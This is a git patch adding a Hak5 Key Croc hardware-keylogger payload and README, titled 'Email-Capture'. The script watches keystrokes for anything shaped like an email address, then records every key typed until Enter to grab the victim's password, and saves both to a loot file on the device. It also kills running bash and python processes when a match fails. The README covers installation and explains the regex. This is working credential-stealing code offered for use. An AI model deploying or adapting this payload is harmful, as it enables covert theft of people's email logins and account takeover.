From 433337b9f77630f3ea42f6198cdf07ccc58979bb Mon Sep 17 00:00:00 2001 From: spywill Date: Thu, 20 Apr 2023 10:26:26 +0000 Subject: [PATCH 1/2] Create Email_Capture.txt Capture target E-mail address & password --- .../ Email-Capture/Email_Capture.txt | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 payloads/library/credentials/ Email-Capture/Email_Capture.txt diff --git a/payloads/library/credentials/ Email-Capture/Email_Capture.txt b/payloads/library/credentials/ Email-Capture/Email_Capture.txt new file mode 100644 index 0000000..0e4ac67 --- /dev/null +++ b/payloads/library/credentials/ Email-Capture/Email_Capture.txt @@ -0,0 +1,36 @@ +# Title: Email-Capture +# Description: Capture target E-mail address & password save to /udisk/tools/target_email.txt +# Author: Spywill +# Version: 1.1 +# Category: Key Croc + +MATCH (^[a-zA-Z0-9_\-\.]+@[a-zA-Z0-9_\-\.]+\.[a-zA-Z]{3,5}$) + +pattern='^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{3,5})$' + +EMAIL_PASS() { + until [ -f /tmp/target_email_pw.txt.filtered ]; do + : + done + LED G + cat /tmp/target_email_pw.txt.filtered >> /root/udisk/tools/target_email.txt + rm /tmp/target_email_pw.txt /tmp/target_email_pw.txt.filtered + LED OFF + RELOAD_PAYLOADS +} + +if [[ "$LOOT" =~ $pattern ]]; then + LED B + echo "$LOOT" >> /root/udisk/tools/target_email.txt +else + LED R + killall -9 bash + killall -9 python + sleep 1 + LED OFF + RELOAD_PAYLOADS +fi + +SAVEKEYS /tmp/target_email_pw.txt UNTIL ENTER +LED OFF +EMAIL_PASS From 531cc0578c1454268b14757f451e284da4eb57f3 Mon Sep 17 00:00:00 2001 From: spywill Date: Thu, 20 Apr 2023 10:31:41 +0000 Subject: [PATCH 2/2] Create README.md --- .../credentials/ Email-Capture/README.md | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 payloads/library/credentials/ Email-Capture/README.md diff --git a/payloads/library/credentials/ Email-Capture/README.md b/payloads/library/credentials/ Email-Capture/README.md new file mode 100644 index 0000000..786c782 --- /dev/null +++ b/payloads/library/credentials/ Email-Capture/README.md @@ -0,0 +1,27 @@ +# Email-Capture +## INTRODUCTION : +* This project is developed for the HAK5 KeyCroc. + - Capture target E-mail address & password save to /udisk/tools/target_email.txt. + - This should work on all operating systems. + +## INSTALLATION : + - Will need to enter arming mode on your keycroc to install file. + - File is called **Email_Capture.txt** Place this in the KeyCroc **payload folder**. + +## PAYLOAD INFO : + +This payload will use Key Croc MATCH command using regular expressions pattern. + - (^[a-zA-Z0-9_\-\.]+@[a-zA-Z0-9_\-\.]+\.[a-zA-Z]{3,5}$) + + Here's how the pattern works: + + - The pattern starts with a caret (^) which represents the beginning of the string. + - Then it matches one or more occurrences of any alphanumeric character (a-z, A-Z, 0-9), underscore (), hyphen (-), or period (.) using the character set [a-zA-Z0-9-.]+. This represents the local part of the email address, which is the part before the "@" symbol. + - The "@" symbol is matched next. + - Then another character set [a-zA-Z0-9_-.]+ is used to match the domain name of the email address, which can include alphanumeric characters, underscore, hyphen, and period. + - The domain name is then followed by a period (.), and the top-level domain (TLD) is matched using the character set [a-zA-Z]{3,5}. This ensures that the TLD is between 3 and 5 characters long. + - Finally, the pattern ends with a dollar sign ($), which represents the end of the string. + +Overall, this regular expression pattern is used to validate that a string follows the basic format of an email address. However, it does not guarantee that the email address is actually valid or in use. + + -After MATCH pattern, payload will run the SAVEKEYS command and Attempt to capture password, this will save all characters until ENTER key is pressed.